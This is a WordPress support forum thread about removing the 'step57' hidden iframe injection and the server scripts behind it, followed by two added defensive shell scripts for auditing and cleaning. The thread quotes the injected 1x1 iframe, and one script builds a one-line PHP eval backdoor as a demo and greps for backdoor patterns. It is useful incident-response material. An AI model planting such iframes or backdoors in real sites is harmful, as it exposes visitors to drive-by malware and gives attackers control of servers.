• dannouk

    (@dannouk)


    My site has once again been hacked. Every page seems to have had the line <iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe> injected into it. I realise this is most likely my fault for bad security measures... but how do I remove it and ensure it doesn't happen again?

Viewing 9 replies - 1 through 9 (of 9 total)
  • ladydelaluna

    (@ladydelaluna)

    May we please have the URL to the site so we can take a better look?

    And in the future, it's best to remove the "install.php" and "upgrade.php" files from your server (ONCE YOU'RE DONE WITH THEM). It's not a complete solution, but I've read that it helps.

    DannoUK – what’s almost certainly happened is this:

    A malicious script has been set loose on the webhosts server.
    That script searches for files that it can write to.
    Such files are usually theme files.
    This is not WP hacking so much as a combination of web host security and your file permissions.

    Download your current theme.
    Go through each file in that theme checking for the garbage code.
    Delete it all, obviously.
    Upload the files and then change their permissions to 644 and NO higher. No 664 / 666 or anything else.
    Check the site works.
    If not, check your file editing.

    You cannot now edit files online.

    NO files on a site should ever be writable and if they are you must know where, why and the risks.

    Thread Starter dannouk

    (@dannouk)

    Thanks for all this. I'm pretty sure that's exactly what happened, Podz. I realised it wasn't just a WordPress problem, as a site I have with Coppermine on it has also got the same problem. I will try your solutions. Thanks again.

    mythusmage

    (@mythusmage)

    File Editing:

    If your host provides a control panel (cPanel for instance) you can access your files through the file manager function. In cPanel find the theme files you wish to edit (can involve a bit of clicking on folders). Click on a file’s name. This will bring up a list of options on the right side of the page. One option is “edit file”. Click on that. A new window will open and you’ll be able to edit it as normal.

    BTW, in cPanel you can make copies of your files. I recommend making copies of your theme files.

    Does anybody know the name of this script that would be on the server?

    I have my own dedicated server and I’d like to make sure the script is off the server.

    The only way I’ve been able to deal with them is to make sure all folders are CHMOD to 755 and all files are CHMOD to 644. Otherwise you’ll get them no matter what. Even then I still get them on occasion (I must have missed some files somewhere) and have to go through and redo everything.

    It’s a common problem for several sites. Generally they also get into any global files for forum software, which is an easier fix, but still just as much of a pain.

    I too have had this problem plague me for months, on and off, on my server - found this info this morning - and also found the file!

    See: http://securityresponse.symantec.com/avcenter/venc/data/php.rstbackdoor.html

    I found this virus in a file called news.php by downloading my site again to a backup folder on my PC, then scanning the folder with Norton.

    Hope this helps.

    I had this problem on an MT site a couple of years ago. I'm trying to remember exactly what I did... I *do* know that if you just partially stop it, it'll just come back over and over again. But once you completely erase it, it usually doesn't come back (I know the MT blog has never had a problem since).

    I know that the 1×1 pixel iframe was at the bottom of *all* of my posts. I also noticed that my permissions to files had been changed from whatever they were originally to 666 and 777 – if I remember correctly, the files in question were originally 755 and 644. So the first thing I did was go through my cPanel and CHMOD’d all the files back to what they were supposed to be. Then I went into my MT system and republished all of my pages – which got rid of the iframe script at the bottom of every page.

    But the BIG thing was that there was actually a script installed on my server. Man, what was the path for that thing? When I found the actual script that did it, I deleted the hell out of it, and it never came back. Prior to figuring out that a script had actually been installed, it kept coming back on me – even the file permissions would continue to change.

    Oh yeah, I changed my username/password to log in, as well.

    AH! There it is. The hijack attempt would download a trojan to your computer (if you were using IE) and redirect your page to Search.ug. Okay, they had added a line to my .htaccess file as well, so any 404 would be redirected. I got rid of that and re-uploaded an old (and clean) .htaccess file. The file I had to delete was called "configs.php"; it was in some subfolder of my root system. Once I fixed the .htaccess, removed "configs.php", changed username and password, rebuilt my posts/site and checked my CHMOD settings, it has never returned.

    (Wow, lotta info there, eh? Sorry for the novel!)

    Hope that helps someone out!
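    The .htaccess redirect and the planted "configs.php" described in the post above are the two things a quick audit of a downloaded site copy should look for. The script below is an added example, not code from the thread, from WordPress or from Symantec: a read-only audit that lists .htaccess directives pointing off-site, PHP files containing constructs dropped backdoors commonly rely on, and PHP files modified in the last N days. The indicator strings are generic heuristics chosen for this example, and the sample tree it builds (including a one-line eval script named configs.php after the post) is constructed for the demonstration; pass the path of your own downloaded copy instead.

```shell
#!/bin/sh
# Added example (not from the thread): read-only audit of a downloaded site copy
# for an off-site .htaccess redirect and a dropped PHP script. Nothing here
# deletes or modifies files; it prints candidates for a human to review.
# Indicator patterns are generic heuristics, not signatures from the thread.
set -eu

# 1. .htaccess directives that send visitors to another host: an ErrorDocument
#    whose target is a full URL, or a Redirect/RewriteRule pointing at http(s)://.
#    Legitimate sites do this too, so each hit is something to read, not proof.
audit_htaccess() {
    find "$1" -type f -name .htaccess -exec grep -nHE \
        '^[[:space:]]*(ErrorDocument|Redirect|RedirectMatch|RewriteRule)[[:space:]].*https?://' \
        {} + 2>/dev/null || true
}

# 2. PHP files containing constructs that dropped backdoors typically use:
#    eval() of a decoded payload, or direct shell execution. Expect some false
#    positives in legitimate plugins; compare hits against a clean download.
find_backdoor_indicators() {
    find "$1" -type f -name '*.php' -exec grep -lE \
        'eval[[:space:]]*\([[:space:]]*@?(base64_decode|gzinflate|gzuncompress|str_rot13)|(passthru|shell_exec|proc_open)[[:space:]]*\(' \
        {} + 2>/dev/null || true
}

# 3. PHP files changed in the last $2 days. Re-infection shows up here first,
#    and anything modified on a day you changed nothing deserves a look.
recently_changed() {
    find "$1" -type f -name '*.php' -mtime "-$2"
}

# Constructed sample tree (not real site content) so the audit runs offline.
demo_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-content/uploads/cache"
    printf '%s\n' '# constructed sample .htaccess' 'RewriteEngine On' \
        'RewriteRule ^(.*)$ /index.php?q=$1 [L]' \
        'ErrorDocument 404 http://example.com/redir.php' > "$d/.htaccess"
    printf '%s\n' '<?php require "wp-blog-header.php"; ?>' > "$d/index.php"
    # A planted script in the style the post describes: one eval of a decoded payload.
    printf '%s\n' '<?php @eval(base64_decode($_REQUEST["c"])); ?>' \
        > "$d/wp-content/uploads/cache/configs.php"
    echo "$d"
}

SITE=${1:-$(demo_tree)}
echo "== .htaccess directives pointing off-site =="; audit_htaccess "$SITE"
echo "== PHP files with backdoor indicators ==";     find_backdoor_indicators "$SITE"
echo "== PHP files changed in the last 7 days ==";   recently_changed "$SITE" 7
```

Every hit is a candidate to read against a known-good copy; the audit deletes nothing. It will not see a backdoor that uses a different encoding trick, or one sitting in a non-.php file the server is configured to execute, which is why diffing the whole download against a clean install, or scanning it with an AV product as the previous poster did, still matters.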

    I'm a little late to this party, but just found a couple of blogs hit by step57. I'm a tech dunce for the most part. Is there a fast way to scan all the files in the blog to see where to remove the offending code:

    <iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>

    Regards,

    eric
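
    Podz's clean-up procedure earlier in the thread (download the theme, strip the garbage code from each file, upload and set 644) and eric's question about scanning every file call for the same tool, so here is one added example that is not code from the thread or from WordPress: a shell script that finds every PHP/HTML file under a downloaded copy of the site that still carries the step57 iframe, strips the tag (keeping a .bak of each file), then resets directories to 755 and files to 644 and reports anything left world-writable. The sample theme it builds under a temporary directory is constructed for the demonstration; run it with the path of your downloaded copy instead.

```shell
#!/bin/sh
# Added example, not code from the thread: clean the injected step57 iframe out
# of a downloaded copy of the site and lock permissions down as Podz describes.
# Work on the local copy, diff the .bak files, then upload.
set -eu

# Host from the injected tag quoted in the thread, as a regex. Matching on the
# host rather than the exact tag also catches variants with other attributes.
INJECT_RE='step57\.info'

# List every PHP/HTML file under $1 that still carries the injected host.
find_infected() {
    find "$1" -type f \( -name '*.php' -o -name '*.html' -o -name '*.htm' \) \
        -exec grep -Il "$INJECT_RE" {} + 2>/dev/null || true
}

# Strip any <iframe ...step57.info...></iframe> tag from $1, keeping $1.bak so
# the change can be diffed before the file goes back on the server. A line that
# held only the iframe is left empty rather than deleted.
clean_file() {
    cp "$1" "$1.bak"
    sed "s|<iframe[^>]*$INJECT_RE[^>]*>[[:space:]]*</iframe>||g" "$1" > "$1.tmp" \
        && mv "$1.tmp" "$1"
}

# Directories 755, files 644: only the owning account can write. That stops a
# script running as a separate web-server user; if PHP runs as your own account
# (suEXEC/suPHP), the mode alone does not protect you.
reset_perms() {
    find "$1" -type d -exec chmod 755 {} +
    find "$1" -type f -exec chmod 644 {} +
}

# Anything still writable by "other" after the reset is a mistake to fix.
world_writable() {
    find "$1" -perm -002
}

# Clean every infected file under $1, reset permissions, print how many were cleaned.
clean_site() {
    n=$(find_infected "$1" | wc -l | tr -d ' ')
    find_infected "$1" | while IFS= read -r f; do clean_file "$f"; done
    reset_perms "$1"
    echo "$n"
}

# Constructed sample theme (not real site content) so the script runs offline.
demo_site() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-content/themes/default"
    printf '%s\n' '<?php get_header(); ?>' '<div id="content">hello</div>' \
        '<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>' \
        '<?php get_footer(); ?>' > "$d/wp-content/themes/default/index.php"
    printf '%s\n' '<?php /* untouched */ ?>' > "$d/wp-content/themes/default/functions.php"
    chmod 666 "$d/wp-content/themes/default/index.php"   # the writable state the attacker relied on
    echo "$d"
}

SITE=${1:-$(demo_site)}
echo "cleaned $(clean_site "$SITE") file(s) under $SITE"
echo "still world-writable:"; world_writable "$SITE"
```

This only touches files. An iframe that was appended to post content (the MT poster's case) lives in the database on WordPress, not in the theme, and needs a search of the posts table rather than a file scan; and as several posters note, if the dropped script itself is still on the server the injection will simply return.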

  • The topic ‘Site hacked by step57 again!’ is closed to new replies.